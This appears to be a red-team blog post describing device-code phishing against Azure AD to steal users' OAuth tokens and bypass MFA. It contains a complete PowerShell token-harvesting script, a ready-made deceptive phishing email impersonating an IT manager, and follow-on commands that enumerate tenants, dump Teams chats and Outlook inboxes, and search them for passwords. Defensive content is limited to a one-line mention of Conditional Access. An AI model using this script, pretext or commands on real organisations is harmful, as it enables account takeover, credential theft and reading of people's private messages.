Azure AD Penetration Test Initial Access Phase (Red Team on Azure AD)

That will be short and to the point for Azure AD Penetration Test and Red Teaming. There are some ways of Phishing users in Azure AD and getting the tokens of users from there. Even that gives you bypass MFA implementations. You can bypass not only Authenticator App but also Yubikey implementations.

Device Authentication Method

Device Authentication Method

The basic idea to utilize device code authentication for phishing is the following.

1. An attacker connects to /devicecode endpoint and sends client_id and resource
2. After receiving verification_uri and user_code, create an email containing a link to verification_uri and user_code, and send it to the victim.
3. Victim clicks the link, provides the code and completes the sign in.
4. The attacker receives access_token and refresh_token and can now mimic the victim.
5. Run the script below;

Which is taken from o365 blog in the reference;

$body=@{
 "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
 "resource" =  "https://graph.windows.net"
}


$authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" -Body $body
$user_code =    $authResponse.user_code

######################################################################## 
########################################################################
Get-AADIntGlobalAdmins -UserPrincipalName "user@yourexample" -DisplayName "Exercise"

# Invoke the request to get device and user codes
# Send to attacker
# https://microsoft.com/devicelogin login

#Hi!,

#This is an urgent situation. You'r device is affected by malware and we are taking some malicious logs
#from your device. So we have deleted your device from our Azure AD resources.
#By using the code:  you need to reregister to https://microsoft.com/devicelogin and 
#resign all applications again.

#Your IT manager



########################################################################
########################################################################
# Already sent a phishing attack to victim now we are going to next step.

$continue = $true
$interval = $authResponse.interval
$expires =  $authResponse.expires_in

# Create body for authentication requests

$body=@{
 "client_id" =  "d3590ed6-52b3-4102-aeff-aad2292ab01c"
 "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
 "code" =       $authResponse.device_code
 "resource" =   "https://graph.windows.net"
}

# Loop while authorisation is pending or until timeout exceeded

while($continue)
{
 Start-Sleep -Seconds $interval
 $total += $interval

 if($total -gt $expires)
 {
  Write-Error "Timeout occurred"
  return
 }
    
 # Try to get the response. Will give 40x while pending so we need to try&catch

 try
 {
  $response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0 " -Body $body -ErrorAction SilentlyContinue
 }
 catch
 {
  # This is normal flow, always returns 40x unless successful

  $details=$_.ErrorDetails.Message | ConvertFrom-Json
  $continue = $details.error -eq "authorization_pending"
  Write-Host $details.error

  if(!$continue)
  {
   # Not pending so this is a real error

   Write-Error $details.error_description
   return
  }
 }

 # If we got response, all okay!

 if($response)
 {
  break # Exit the loop

 }
}


#Then start running these commands 
# Enumerate AAD

Get-AADIntUsers -AccessToken $response.access_token | select displayname
Get-AADIntGlobalAdmins -AccessToken $response.access_token
Get-AADIntTenantID -AccessToken $response.access_token
Get-AADIntTenantDetails -AccessToken $response.access_token
get-aadintusermfa -AccessToken $response.access_token

Limitation from Attacker Perspective

• Victim should authenticate in 15 min
• Attackers login to system so their logs will be there.

Preventing

• Conditional Access (CA)

Azure AD Red Team First Action

After getting these tokens you can do more, you can change these tokens and read MS Team Chats and Outlook messages of users. And without looking at security best practices lots of users, unfortunately, share their passwords in Ms Team chats and Outlook messages so go and search passwords for Red Teaming.

Follow the first step above and after getting the tokens above run these commands.

#Download TokenTactics from that github page https://github.com/rvrsh3ll/TokenTactics

Import-Module .\TokenTactics.psd1

# It will give you tokens that you will need.
Get-AzureToken -Client MSGraph


# Phish the user and get the tokens of user

RefreshTo-MSTeamsToken -domain <domain.name> 

#After getting phished get all Teams messages
Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token


#Search for a password in MSTeam messages

Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Select-String -Pattern Password


Connect-AzureAD -AadAccessToken $response.access_token -AccountId <email@domain.name>

Get-AzureADUser

# That will give you MSGraphToken variable with tokens inside
RefreshTo-MSGraphToken -domain <domain.name>


# Dump all emails with that command $MsGraphToken from RefreshTo-MsGraphToken commands result

Dump-OWAMailboxViaMSGraphApi -AccessToken $MSGraphToken.access_token -mailFolder inbox

# With that you can go and look via browser. 
RefreshTo-SubstrateToken -domain <domain.name>

# It will give you a request, follow instructions and use it in Burp and you will have
# browser view. 

Open-OWAMailboxInBrowser -AccessToken $SubstrateToken.access_token

Follow me in gitbook/github.

• https://github.com/mturhanlar
• https://github.com/mturhanlar/turme
• https://turme.gitbook.io/blog/azure-ad-penetration-test/initial-access

References

• https://o365blog.com/post/phishing/